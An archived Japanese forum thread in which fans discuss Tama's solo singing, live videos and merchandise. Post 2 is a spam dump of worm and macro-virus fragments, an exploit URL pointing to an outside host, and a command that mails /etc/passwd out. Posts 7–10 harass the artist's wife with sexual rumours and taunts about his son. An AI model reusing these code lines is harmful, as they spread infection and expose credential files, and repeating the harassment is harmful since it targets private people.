5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Tama10「まさみちゅーん」

1 :Metal Cool:2006/10/09(月) 18:10:24 ID:blBmrPs0
アーティスト(AMUSE所属)Tamaについて語るスレです。

・荒らし、煽りは限りなく放置、構った途端にアナタも電波。
・マターリsage進行。
>>950を踏んだ人は新スレ立て係に強制任命。踏み逃げ厳禁。

最新情報は所属事務所AMUSEのサイト等を見て個人で調べて下さい。

前スレ
Tama9「Shyboy shouts on Live!」
http://music5.2ch.net/test/read.cgi/musicjm/1146984219/

Tamaスレ過去ログ置き場
http://www.geocities.jp/shiratamamasami/

2 :NO MUSIC NO NAME:2006/10/09(月) 18:38:21 ID:bQvNxquN
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ


3 :誘導:2006/10/10(火) 01:23:27 ID:XMBtmzzu
Tama10「Metal Cool」
http://music5.2ch.net/test/read.cgi/musicjm/1160383267/l50

4 :NO MUSIC NO NAME:2006/10/10(火) 02:09:51 ID:+QVe63EB
この人って元

5 :NO MUSIC NO NAME:2006/10/11(水) 00:51:17 ID:fzu6SvD9
>>1

甲乙

6 :NO MUSIC NO NAME:2006/10/23(月) 02:23:32 ID:QA/exa6r
たまって今、何歳なの?

7 :NO MUSIC NO NAME:2006/11/03(金) 13:33:54 ID:Cy3h0vgX

とうとうばらされた。。。ポルノグラフィティと検索し、
ポルノグラフィティの、というスレ見てみて!つーかばらすなよ!みたいな
自分、コピーしちゃったんで。だって永久保存モノジャン?たまの奥さん。

8 :NO MUSIC NO NAME:2006/11/05(日) 03:30:34 ID:KSMD4Qke
キンタマ

9 :NO MUSIC NO NAME:2006/11/15(水) 15:09:32 ID:Z+pgYOvO
7>>続きがあったよ。ソ−プランド時代の写真もあるんだってさ。
検索してごらん。

10 :NO MUSIC NO NAME:2006/11/25(土) 12:02:32 ID:UVO7/UDQ
みたよ!他のレスとか全部保存してやった。白玉雅巳の息子が小5くらいに
なったらプレゼントしてあげよう。家庭内暴力になるかな?プッ!


11 :NO MUSIC NO NAME:2006/12/03(日) 23:36:19 ID:HvwgjsJ8
とりあえず保守あげ

12 :NO MUSIC NO NAME:2006/12/05(火) 22:38:51 ID:S9S3KpYA
こんなこと聞いて悪いんだけどさ、
現時点でTamaが事務所をクビになって活動ができなくなる確率ってどれくらいなの?

13 :NO MUSIC NO NAME:2006/12/06(水) 12:50:42 ID:UwNnwPxM
1000パ-セント!嫁がさげまんじゃね〜今はポルノの貯金があるからいいけど
それが底をついたら、、、悲惨です。

14 :NO MUSIC NO NAME:2006/12/06(水) 19:32:02 ID:WhOE0SkE
何だここ、前と違って荒れてんな

15 :NO MUSIC NO NAME:2006/12/06(水) 20:11:13 ID:AAA8OA0A
昨日のライブぬるかったって書いた者けど真ん中辺りにいた。
やっぱりまだまだだと思う。
箱ライブにしちゃぬるかったよ。
でももっと良くなるんじゃないかなって感じがしたからやっぱりライブはいっぱいやってほしい。

16 :NO MUSIC NO NAME:2006/12/06(水) 20:13:11 ID:xdCfvxUP
>>15
Aがいっぱいw

17 :NO MUSIC NO NAME:2006/12/06(水) 20:14:04 ID:ayHjXuGv
次スレ11はこのスレ使うんかい。
っていうかまだ残ってたのかこのスレ。
このスレなんてアンチにくれてやって、正式に11立てたら?

18 :NO MUSIC NO NAME:2006/12/06(水) 20:45:44 ID:fucrkncW
>>17
鯖負担になるから使い切るのが普通

19 :NO MUSIC NO NAME:2006/12/06(水) 21:32:22 ID:P7DqSZbU
1/10に入れなかった自分…orz
今後もTama歌でいくのか

20 :NO MUSIC NO NAME:2006/12/06(水) 23:49:11 ID:iKEIgdvF
前スレのカメラの話だが、4台くらいカメラあったっぽいぞ。
「今流行のHPで〜」みたいな事言ってたから
DVD発売ではなくHPでリリースコメントみたいにうpだと思う

21 :NO MUSIC NO NAME:2006/12/07(木) 02:04:10 ID:3enI5ebu
>>17
今のTamaにアンチなぞいるのかw

22 :NO MUSIC NO NAME:2006/12/07(木) 02:21:35 ID:uZGcistB
いるのは嫁アンチばっかなんだろ?
そういえばメル友のまたメル友くらいの関係の人がいまだにカレー娘(の疑いをかけられた人)の監視?をしてるらしい。
カレー娘が今どこで働いてるか知ってるみたいだからもはや基地外の域にあるよな

23 :NO MUSIC NO NAME:2006/12/07(木) 02:49:01 ID:IL+1kSF6
嫁アンチばっかってか、一人が勝手に騒いでるだけじゃね?
Tama嫁に嫉妬してるんだろ

24 :NO MUSIC NO NAME:2006/12/07(木) 08:27:21 ID:VVAZ69sE
どのアーにも言えるんだろうが、コアファンの中にはそういう
テコ入れの方向間違って暴走してるヤツもいるんだな

25 :NO MUSIC NO NAME:2006/12/07(木) 09:11:22 ID:5GJFxWgJ
カレー娘ナツカシスwww
なんだっけ情報落としてたやつ、わかめカリーだっけ?
結局結婚の事実が明るみになるころにはフェードアウトしてて、以降話題にも挙がらなくなったな

26 :NO MUSIC NO NAME:2006/12/07(木) 21:00:11 ID:0LtjYP5X
Tama嫁美人なのだろうか・・・。

話豚切るけど、メタクのPVフルで見たヤシいんの?

27 :NO MUSIC NO NAME:2006/12/08(金) 10:23:20 ID:woAkSi3z
Tama嫁と真ん中のカノって仲良いの?
それともお互いのパートナー繋がりでただの顔見知り程度なのか?

28 :NO MUSIC NO NAME:2006/12/08(金) 11:35:51 ID:BxPlHroH
いい加減にしろ。

>>27
サビしか作ってないんじゃないの?

29 :NO MUSIC NO NAME:2006/12/08(金) 11:37:02 ID:BxPlHroH
×>>27
>>26

30 :NO MUSIC NO NAME:2006/12/09(土) 20:56:18 ID:/ZkFoPOA
ブログ更新!
ktkr

31 :NO MUSIC NO NAME:2006/12/09(土) 21:07:54 ID:d/7ebkAs
ktkr!!!
ワクワクテカテカ(・∀・)

32 :NO MUSIC NO NAME:2006/12/09(土) 22:11:59 ID:4xNAq6qT
wktk!wktk!
行けない人に こういう配慮は本当にありがたい…
久しぶりに見れる…。・゜・(ノД`)・゜・。

33 :NO MUSIC NO NAME:2006/12/09(土) 23:08:22 ID:x74wKKHM
ホント行けなかったファンに優しいよなー楽しみだ

34 :NO MUSIC NO NAME:2006/12/10(日) 04:09:43 ID:Xz582vPe
ティン!

35 :NO MUSIC NO NAME:2006/12/10(日) 13:31:49 ID:wdgyvs7+
オリコンのホームページにライブ写真載ってた

36 :NO MUSIC NO NAME:2006/12/11(月) 14:08:34 ID:e5OSGj1F
ttp://www.oricon.co.jp/news/confidence/39981/

これか。めっちゃカコイイな

37 :NO MUSIC NO NAME:2006/12/11(月) 14:55:04 ID:mGiiVdAS
ママン(´・ω・`)


3人じゃないと・・・


自分も3人と聞いてプーフミママン?と一瞬思ってしまった


深読み以前にここ見るまで


普通にママンだと思って少し悲しくなってた自分ってどうなんだろう


吹っ切れてはいるはずだったのに・・・





ママン・・・・・・(´・ω・`)

38 :NO MUSIC NO NAME:2006/12/11(月) 14:56:56 ID:mGiiVdAS
ママン(´・ω・`)


3人じゃないと・・・


自分も3人と聞いてプーフミママン?と一瞬思ってしまった


深読み以前にここ見るまで


普通にママンだと思って少し悲しくなってた自分ってどうなんだろう


吹っ切れてはいるはずだったのに・・・





ママン・・・・・・(´・ω・`)

39 :NO MUSIC NO NAME:2006/12/11(月) 22:05:41 ID:TSt3o0cC
好い加減いちいちうざい
折角ライブもやってツアーもやるって建設的になってるのに

40 :NO MUSIC NO NAME:2006/12/11(月) 23:29:09 ID:TPJxQrcg
そういや、色んなとこで五日のレポ読んだけど、
以外とTamaにヲタの意見が届いてたりするんだね。

この前のラジオでも「ストレンジをシングルにしたらいいのにみたいな事を言われて〜…」みたいな話してたし。

41 :NO MUSIC NO NAME:2006/12/12(火) 14:20:26 ID:OG4mp4LM
そもそも絶対数が少なめだから目を通しやすいんじゃ?

42 :NO MUSIC NO NAME:2006/12/13(水) 09:14:47 ID:iW+6TOhE
>>41
言わないでおこうと思ったのに…

43 :NO MUSIC NO NAME:2006/12/14(木) 16:34:49 ID:2hbGRV/V
二曲目なんかビジュアル系でありそうやな。

44 :NO MUSIC NO NAME:2006/12/14(木) 21:33:20 ID:62LH79dB
ライブのダイジェスト配信明日からだな
wktk

45 :NO MUSIC NO NAME:2006/12/15(金) 15:07:51 ID:KCBH4Ue2
ブログ更新!

46 :NO MUSIC NO NAME:2006/12/15(金) 16:00:05 ID:KHmoSqSM
映像見てきた
演奏してる姿はかっこよくてポルノ時代を思い出したけど
やっぱり歌い始めたとたん萎えた

47 :NO MUSIC NO NAME:2006/12/15(金) 19:25:44 ID:ZaPwpQLQ
ライブ映像見た

もっと練習すりゃそこそこ上手くなるんじゃないだろうか
という希望は持てる感じだったからまあ末永く見守ろうと思う


48 :NO MUSIC NO NAME:2006/12/15(金) 20:52:45 ID:/5gMm9qd
どーせMac部ですよ

49 :NO MUSIC NO NAME:2006/12/15(金) 21:44:01 ID:jgNEMr8t
>>48
URLを直接入力すれば見られない?

50 :NO MUSIC NO NAME:2006/12/15(金) 21:49:50 ID:ng/POi0I
何とかなる…かなぁ…、これ

51 :NO MUSIC NO NAME:2006/12/16(土) 00:02:30 ID:Ug+K1wRT
上手いじゃん!と思ったら
Tamaじゃなくて次のKに動画が切り替わっていたよ…

キーワードはHappyなのか
幸せなのはわかったから
頑張って歌のスキルをあげてくれ



52 :NO MUSIC NO NAME:2006/12/16(土) 00:26:24 ID:Sc+5UMbA
初めてStrange〜聴いたけど結構いいね、曲は。
あと、やっぱベース持ってる姿はかっこよかった。

53 :NO MUSIC NO NAME:2006/12/16(土) 00:27:48 ID:z9fTEezw
歌唱力は最悪だが、音感に助けられてるから、まだマシ。

54 :NO MUSIC NO NAME:2006/12/16(土) 00:35:01 ID:qwdLvO3v
Tamaはあの歌唱力でプロとしてステージに立った事を恥じるべきだ
「とても熱いライブだったんじゃないかなと思っています。」じゃねーよ
Tama好きだけど心底がっかりした


55 :NO MUSIC NO NAME:2006/12/16(土) 05:55:05 ID:VvRGVqBM
>>54
そういう本当のことは言えないのが基本のコメントに難癖付けるのは無しだろう。

56 :NO MUSIC NO NAME:2006/12/16(土) 15:56:14 ID:89Cv3bGn
>>55
日本語でおk

57 :NO MUSIC NO NAME:2006/12/16(土) 17:24:55 ID:fy8+stEU
>>56
お前頭弱いな。

58 :NO MUSIC NO NAME:2006/12/17(日) 00:44:27 ID:RRD0sYTF
>>56の理解力がなさすぎてワロタw

59 :NO MUSIC NO NAME:2006/12/17(日) 02:50:11 ID:T9Nl71F9
映像見たら思いの他悪くなかったな。つうか、握手会とかすご。

60 :NO MUSIC NO NAME:2006/12/17(日) 02:51:59 ID:T9Nl71F9
失礼。早とちりだった。

運命を君をも曲がりくねっているRoad

・・・winding road?

61 :NO MUSIC NO NAME:2006/12/17(日) 07:01:57 ID:J7qFDoTq
歌に関しては素人並みもしくはそれ以下
音消して映像だけ見てるとかっこいい

62 :NO MUSIC NO NAME:2006/12/17(日) 13:39:27 ID:4Bcuk5Yc
>>60
それ以前に日本語として(ry

63 :NO MUSIC NO NAME:2006/12/17(日) 20:41:56 ID:bR3yv4RR
前も書いたけどTamaの歌って芯がないっていうかなんか抜けちゃう感じっていうか…
だからライブの時もなんかガツンとこなくて物足りないというか冷静に見ちゃったし。
もっとライブいっぱいやったりしたらどうにかなったりしないかなー。

64 :NO MUSIC NO NAME:2006/12/18(月) 03:40:08 ID:oNsZfcCp
「運命を〜」はTamaなりのギャグなんだろうか。

65 :NO MUSIC NO NAME:2006/12/18(月) 07:19:24 ID:Bx3N79q/
なんか罰ゲームで無理矢理ステージに上がらされて
死に物狂いで歌ってる人みたいだった・・・・・

66 :NO MUSIC NO NAME:2006/12/18(月) 08:30:18 ID:OiJR+n5V
なんてーか……

じょあああぁあぁぁぁあ!にメロディーが付いただけみたい。

67 :NO MUSIC NO NAME:2006/12/18(月) 14:54:39 ID:mR5kzPd9
何かと比べて物足りなさを感じてるんだったらそれは間違いだと思うよ。
注:何か=ポルノではないよ。

68 :NO MUSIC NO NAME:2006/12/18(月) 17:30:11 ID:z00vJnQy
ライブ後半の方のFuturesかStrangeあたりで
本来の音の半音上〜1音近く音程がシャープしたままずっと歌ってて
失礼だけど音痴の典型だなと思ってしまった
モニターの状況とか色々あるんだろうけど…

知り合いにも音痴な奴がいるけど
本人はズレている事を自覚してなかったりするよね

69 :NO MUSIC NO NAME:2006/12/18(月) 18:37:42 ID:goIDxx2h
音感はあるはずだから、音を修正できないってことだな

70 :NO MUSIC NO NAME:2006/12/18(月) 18:44:45 ID:iVkd8WDD
動画見た。

これはひどい

71 :NO MUSIC NO NAME:2006/12/18(月) 21:44:34 ID:xrEDiF7V
ライブここで評判良かったから期待してたんだが…
だけど何回も経験を重ねてけばそれなりに上手くなるかな

72 :NO MUSIC NO NAME:2006/12/18(月) 21:56:26 ID:zc+njQVf
確かにここでは妙に評判よかったよね
場の空気に飲まれたのか?
楽しみに見てみたけど、歌始まって即窓閉じた…orz

73 :NO MUSIC NO NAME:2006/12/18(月) 22:20:12 ID:DPAGl5n1
だからぬるかったって…

74 :NO MUSIC NO NAME:2006/12/19(火) 00:47:14 ID:KjRU5gpd
ベース演奏は相変わらずかっこよかったけど、歌い出した瞬間吹いたw
ところで曲が30秒ぐらいで終わってるけどあれはどういうこと?

75 :NO MUSIC NO NAME:2006/12/19(火) 01:19:52 ID:pbkP35ie
こうして、白玉雅己の武者修行の旅が、始まったのだった。

76 :NO MUSIC NO NAME:2006/12/19(火) 06:53:06 ID:P4fsaBCJ
歌ってるTamaに何の魅力も感じない
これじゃ新規を得るどころかヲタも離れていく一方だぞ……

77 :NO MUSIC NO NAME:2006/12/19(火) 19:04:15 ID:4O8u80oq
ベースを高く突き上げて無言のままそれに応える。まさにCoolだ。

coolだw

78 :NO MUSIC NO NAME:2006/12/19(火) 22:13:02 ID:Nhkas2FP
ベーシストTamaに感じてた熱をソロになった今求めるのは間違ってますか?

79 :NO MUSIC NO NAME:2006/12/20(水) 00:09:29 ID:0WDNEqGa
>>78
彼がベースを持つ限りはいいんではないかと思うけど。
動画のベースソロ、ハーモニクスがチューニングみたいでダサいけど他はかっこよかったし。

80 :NO MUSIC NO NAME:2006/12/20(水) 00:51:02 ID:/YLhwA90
完璧道を踏み外したな
こんなんでよく歌おうと思ったもんだ
曲はかっこいいけどあの歌唱力じゃ台無し

81 :NO MUSIC NO NAME:2006/12/20(水) 01:05:28 ID:7907QSxq
StrangeDaysって昭仁の声にめちゃくちゃ合いそうだね

82 :NO MUSIC NO NAME:2006/12/20(水) 03:16:19 ID:a7FZKMqJ
曲提供とかにすればいいのに…
何故歌わなきゃいけないんだTama

83 :NO MUSIC NO NAME:2006/12/20(水) 07:53:44 ID:un0GMi35
ストレンジは森男きぼん。デスノだし。

84 :NO MUSIC NO NAME:2006/12/20(水) 08:52:54 ID:69mi9byd
>>82
今、Tama提供の曲を歌うことが、その歌手にメリットがあるかと考えると
提供は難しいんじゃないかな
それにTama曲は普通の歌手には歌うのが難しいと思う
昭仁でさえ
「Tamaが作る曲はすごく難しかったりする(中略)それがものになった時はすごい喜びがある」
って言ってたくらいだし

>>83
ここはTamaスレ、帰れ

85 :NO MUSIC NO NAME:2006/12/20(水) 13:47:09 ID:YSP88Mt4
昨日友人にTamaの曲聴かせたらポルノに戻った方がいいだろwって言われたよ

あー来年はツアーで!っていう言葉がこんなにも鬱なんて

86 :NO MUSIC NO NAME:2006/12/20(水) 18:01:07 ID:a7FZKMqJ
>>84
そっかやっぱり曲提供は難しいか
昭仁っていう歌い手がいないのが痛いな
来年はツアーだからそれなりに変わってるといいけど無理かな

87 :NO MUSIC NO NAME:2006/12/20(水) 18:46:55 ID:n/W6z9GO
シングルの発売の時にレコ屋で試聴しようと思ったらおいてすらなかったから
どうしようかと思ってたけど、今日やっとデスノで試聴できた。
サビ前まではクソかっこいいのが逆にむかつくよちくしょー

88 :NO MUSIC NO NAME:2006/12/20(水) 23:30:18 ID:InopKgcs
なんかTamaの声って高校生バンドのボーカルみたいな声してるwww

やっぱ曲提供して欲しかった。
前みたいにインスト曲作って、ほかのグループとコラボした方がよかったな。

89 :NO MUSIC NO NAME:2006/12/21(木) 00:43:52 ID:3Qycqizt
>>88それだ!高校生バンドのボーカル!!
自分、ずっと何て表現すればいいか分かんなかったけど、すっきりした!本当そんな感じだよね。
だから駄目だとか言いたい訳じゃなくてさ。素人っぽいってゆうか。
独り言ですまん。

90 :NO MUSIC NO NAME:2006/12/21(木) 01:44:50 ID:nZt1oA4y
…高校生でプロの歌手も、いっぱいいるのにな…。

91 :NO MUSIC NO NAME:2006/12/21(木) 01:53:24 ID:3Qycqizt
>>89だけど、>>90そうだね。
ごめん、高校生ボーカルの声が素人だ、とかそうゆう意味で言った訳じゃないんだ。ただ何て言うか、例えとして。

92 :NO MUSIC NO NAME:2006/12/21(木) 12:01:43 ID:DAdpi9hK
お前らママンの歌声に対して高校生ボーカルみたいだとか
隣の部屋から聞こえてくるカラオケみたいとか言いたい放題だなwww

ものすごくぴったりな表現だというのが哀しいが

93 :NO MUSIC NO NAME:2006/12/21(木) 12:51:00 ID:4tdp1+qF
>>92隣の部屋から…と表現した人には拍手を送りたいwww

94 :NO MUSIC NO NAME:2006/12/21(木) 15:28:18 ID:fR9WZfCg
ロザリオまだー?
お前らもすっかり忘れるだろw

95 :NO MUSIC NO NAME:2006/12/21(木) 16:15:44 ID:dWqQojx0
いやすっかり忘れてたw
ライブ応募して外れたクチだから関係ないけどwww


orz

96 :94:2006/12/21(木) 20:16:25 ID:pm0p/9f4
忘れるだろ→忘れてるだろ

97 :NO MUSIC NO NAME:2006/12/21(木) 23:04:46 ID:Iy5OWYUI
下手に歌やらペットやらに手を出さないで
ベースを極めてサポメンにでもなった方が生き残れるんじゃないのか

98 :NO MUSIC NO NAME:2006/12/22(金) 00:26:11 ID:ukcP/laE
>歌
見てるこっちがハラハラしちゃマズいだろ・・・
「声裏返らないかな・・?」「音とれるかな・・・?」「ゲホゲホってならないかな・・・?」
とか、いらん心配ばかりしてしまう

99 :NO MUSIC NO NAME:2006/12/22(金) 13:32:54 ID:VwceJUZn
我が子の学習発表会見てるみたいだな

100 :NO MUSIC NO NAME:2006/12/22(金) 20:08:45 ID:SHTPN7SA
ママン100ゲット

101 :NO MUSIC NO NAME:2006/12/23(土) 08:32:47 ID:Zt73H79F
Tamaの歌唱力は「はっさくボーイズ」のピザ男君と同レベル?



だから、サボテン歌ったのか…

102 :NO MUSIC NO NAME:2006/12/23(土) 11:04:36 ID:tsDfaQ6X
これからも歌うつもりなら次のツアーまでに本当に必死で歌の練習してほしい
ライブ映像少し見ただけで失礼かもしれないが
今のレベルはただの恥さらしにしか見えなかった

103 :NO MUSIC NO NAME:2006/12/23(土) 17:17:06 ID:qPX2r8+c
練習してどうにかなるんならいいけどね…

104 :NO MUSIC NO NAME:2006/12/23(土) 20:54:09 ID:45TuaPqh
とりあえず年間100本ライブやれば
少しは聴ける歌声になると思うよ

105 :NO MUSIC NO NAME:2006/12/23(土) 21:22:09 ID:2irGUCHt
ていうか声より歌い方の問題だろうから
数を重ねるうちによりベストなやり方を見つけてくれるといいなぁ

106 :NO MUSIC NO NAME:2006/12/23(土) 23:11:19 ID:uCzxtnEx
自分は声もあんまり歌向きじゃないとオモタ。お塩先生みたいで

107 :NO MUSIC NO NAME:2006/12/24(日) 00:28:21 ID:fIqMoJEt
散々ループしてるし言ってもどうしようもないのは分かってるが
やっぱり歌は昭仁じゃないと・・・・・

曲はすごく良いのを作るだけに
勿体ないし残念でたまらん

108 :NO MUSIC NO NAME:2006/12/24(日) 10:03:28 ID:6l9+Splx
グレプレナイトから1年か
dkwkしながらコマ行ったなー

109 :NO MUSIC NO NAME:2006/12/24(日) 10:07:42 ID:fAtFQb/Y
あの感動は忘れねぇよ。てか現実感がなくて殆どぽーっとしてた。

110 :NO MUSIC NO NAME:2006/12/24(日) 17:32:02 ID:lF3RnJSP
ロザリオ当たった!!!!!@長野

111 :NO MUSIC NO NAME:2006/12/24(日) 17:46:40 ID:mnWXXbVU
ロザリオキター

112 :NO MUSIC NO NAME:2006/12/24(日) 18:30:11 ID:GGUdQXpr
>>110>>111Tamaからのクリスマスプレゼントだね
おめでとう!
ママンも家族でクリスマスしてるかなぁ〜

113 :NO MUSIC NO NAME:2006/12/24(日) 18:40:11 ID:JfiuW9c/
自分のとこにもクリスマスプレゼント来たー!!
でも自分似合わないorz

114 :NO MUSIC NO NAME:2006/12/24(日) 22:06:30 ID:VS+Zs03i
あー1年前が懐かしい…
そしてイヴにロザリオ来るとは粋ですなぁ

115 :NO MUSIC NO NAME:2006/12/24(日) 23:20:45 ID:xDdhVKPP
唄い方と歌詞か、問題は。

なんつーか、ママンって甘ったるい声してる気がする。


あと、個人的には譜割りも気に入らないんだけど、どう?

116 :NO MUSIC NO NAME:2006/12/25(月) 11:00:13 ID:CHU6kJx1
tamaってポルノの途中時代から浮いてたなーって思ってた記憶がある。
んで2人組ポルノ好きになってtamaの必要性を知った

なのに...

117 :NO MUSIC NO NAME:2006/12/25(月) 13:09:32 ID:0CI1SEEw
ほんと良い曲かくよね。
歌声がアレでも、シングル何回も聴いちゃうし。
インストバージョンも入れてくれればなぁ。

118 :NO MUSIC NO NAME:2006/12/25(月) 19:46:06 ID:NEYEKn9A
ポルノでストレンジと未来を発表していれば神曲扱い間違いない。

おまいら、メリークリスマス!

119 :NO MUSIC NO NAME:2006/12/25(月) 21:09:53 ID:y4R85grn
符割りって…ママンの曲は符割りがネ申なんじゃん。アホか

120 :NO MUSIC NO NAME:2006/12/25(月) 22:46:16 ID:Ts4AoZ/S
個人的にはソロになってから曲も微妙なんだよな
ポルノ時代と比べても仕方ないことは分かってるけどさ
とりあえずTamaには来年ライブ頑張ってほしいな

121 :NO MUSIC NO NAME:2006/12/25(月) 22:59:26 ID:vruEMiaA
ポルノ時代の曲も、もしTamaが歌っていたなら微妙だったことだろう・・・

122 :NO MUSIC NO NAME:2006/12/25(月) 23:33:09 ID:HzCE3jyj
>>121
そんな恐ろしいこと言うなよって感じだ

123 :NO MUSIC NO NAME:2006/12/25(月) 23:37:55 ID:YqSXeHOk
ママン、今回のシングルは冒険だったと言うことで、


今度からインスト一筋に絞って下さい。

124 :NO MUSIC NO NAME:2006/12/26(火) 00:44:44 ID:loGrWyhs
個人的に面白かったこのスレ的MVPな発言

"ヲタがMetal Cool"

125 :NO MUSIC NO NAME:2006/12/26(火) 10:05:41 ID:b1uHYsiP
めたるくーらー

126 :NO MUSIC NO NAME:2006/12/27(水) 11:41:07 ID:xI8Wi658
ロザリオキタ━━(゚∀゚)━━━!!@神奈川

127 :NO MUSIC NO NAME:2006/12/27(水) 16:45:38 ID:7hnxojzt
まさみって長澤のこと?

128 :NO MUSIC NO NAME:2006/12/27(水) 17:34:58 ID:Nhux9wrK
>>127
ツマンネ

129 :NO MUSIC NO NAME:2006/12/27(水) 20:03:47 ID:7hnxojzt
>>128
・・・!?
本当に知らないんだけど

130 :NO MUSIC NO NAME:2006/12/27(水) 20:13:06 ID:svqxI6YA
ばか?
知らないなら知らないままで良いよ

131 :NO MUSIC NO NAME:2006/12/27(水) 22:06:58 ID:2BAISDXh
>>127
何故久本まさみとかにならなかったのか不思議すぎる


132 :NO MUSIC NO NAME:2006/12/28(木) 07:23:15 ID:BdXLRqbw
>>130
「ばか?」って……

133 :NO MUSIC NO NAME:2006/12/28(木) 10:32:36 ID:mJEV2CnH
釣りだと判った上で教えてしんぜよう


白玉雅己ちゅーん

134 :NO MUSIC NO NAME:2006/12/28(木) 16:12:39 ID:FjnK5ivW
>>133
氏ね

135 :NO MUSIC NO NAME:2006/12/28(木) 20:46:32 ID:7dN3xIGb
未だにロザリオが来ないのはハズレたということでFA?

136 :NO MUSIC NO NAME:2006/12/28(木) 23:45:08 ID:vVQX/4Oz
凄く今更だが今購入。CDショップでやっと見つけた。
本当に上手かったのか耳がなれたせいなのか、試聴の時よりいい歌に聴こえた。
2曲目めちゃカッコイイ(・∀・)カッコ良すぎだちきしょー( ;∀)=〇)3●)

ごめん、なんか今更。水浴びて落ち着いてくる。

137 :NO MUSIC NO NAME:2006/12/29(金) 00:07:42 ID:fjjFe3jP
>>136
寒いから風邪引くなよ

138 :NO MUSIC NO NAME:2006/12/30(土) 08:09:16 ID:xC+NkQbO
ヤサシスw

139 :NO MUSIC NO NAME:2006/12/31(日) 14:15:28 ID:1RhHreI4
でも実際アミュに所属じゃなかったら
レコ社との契約はこのまま続くのだろうか…心配だ。。

140 :NO MUSIC NO NAME:2006/12/31(日) 16:17:05 ID:Bb19Iokp
明日からは急遽2007年ではなくTamaがポルノに在籍していた2003年になることが決定致しました。

141 :NO MUSIC NO NAME:2006/12/31(日) 18:17:33 ID:foGhNrbN
ちゃんと現実をみるんだ

142 :NO MUSIC NO NAME:2006/12/31(日) 18:50:12 ID:gtRUHYAG
>>139
というか元ポルノという肩書きがなかったら
ビジみたいに切られるんじゃない

143 :NO MUSIC NO NAME:2007/01/01(月) 06:31:12 ID:IRVIUlaS
2003年もよろしく

144 :NO MUSIC NO NAME:2007/01/01(月) 13:40:08 ID:bhUlmAPc
コメント更新


145 :NO MUSIC NO NAME:2007/01/01(月) 17:36:45 ID:IRVIUlaS
2007年もよろしく

146 :NO MUSIC NO NAME:2007/01/03(水) 10:47:46 ID:QfPOsByP
このスレってこんなに痛かったっけ

147 :NO MUSIC NO NAME:2007/01/03(水) 19:50:46 ID:4rlU3903
>>146
シーッ!

148 :NO MUSIC NO NAME:2007/01/03(水) 21:13:41 ID:6kpfoh0x
今はポルノ関連のスレなんて何処もこんなもんさー

149 :NO MUSIC NO NAME:2007/01/03(水) 21:22:18 ID:KwoW+Yq4
年も明けたというのに…
活気なさすぎでは…(ノД`)

150 :NO MUSIC NO NAME:2007/01/04(木) 00:52:26 ID:O2OVrVFA
まぁ仕方ないよ
変なの湧くよりいいじゃん

151 :NO MUSIC NO NAME:2007/01/06(土) 00:44:06 ID:SQmJB8ck
いやぁ………悲しい程静かだなぁ……

152 :NO MUSIC NO NAME:2007/01/06(土) 01:15:08 ID:RI457I9K
まぁ新しい情報もないしねー

153 :NO MUSIC NO NAME:2007/01/06(土) 15:15:25 ID:KXyocr9o
NEWSMAKERに新年コメントが載ってたね

154 :NO MUSIC NO NAME:2007/01/07(日) 19:57:03 ID:3jhxUtY7
>>129だが
しらたままさみの名前から来てるのか
それにしても>>130は酷いな・・・もう少し優しくしてくれても良かっただろ・・・

155 :NO MUSIC NO NAME:2007/01/07(日) 20:05:05 ID:8Wg1+BMJ
Tamaって好んで聴く音楽とかあるのかな。独特な童謡節は何の影響を受けたんだろう

156 :NO MUSIC NO NAME:2007/01/08(月) 10:26:40 ID:peBv/Z3m
>>154
>1に書いてあるでしょ、AMUSE所属のアーティストTamaって。
俺も釣りだと思ったし。これから書き込む前には>1をじっくり読んでからにしよう。

157 :NO MUSIC NO NAME:2007/01/08(月) 13:00:11 ID:5N8o42dY
構うなよアホ

158 :NO MUSIC NO NAME:2007/01/08(月) 14:29:39 ID:vAMCM4Vd
ネタが無いとは言え、馬鹿はほっとけ

159 :NO MUSIC NO NAME:2007/01/08(月) 16:01:04 ID:ubzWOunX
ほんとに今年アルバム出るんかな
全曲Tamaのボーカル入りだとしたら聴くのが楽しみなような恐いような…

160 :NO MUSIC NO NAME:2007/01/08(月) 19:57:21 ID:0OFSB9xw
次のアルバムの売り上げは1682枚。
オワタタ\(^o^)/

161 :NO MUSIC NO NAME:2007/01/08(月) 21:53:01 ID:azFNCY+Y
ニューズメーカーの年賀状のやつ「ですね」の「ね」が小さすぎw

162 :NO MUSIC NO NAME:2007/01/08(月) 22:34:57 ID:ZshZ8WBS
>>155
ブランキーが好きなんじゃなかったっけ?

163 :NO MUSIC NO NAME:2007/01/10(水) 23:40:35 ID:IIB6xuUT
上げますよ

164 :NO MUSIC NO NAME:2007/01/12(金) 13:36:57 ID:MS+X7KGm
>>162
へー、ブランキー聴くんだ。
初耳。ありがとう。

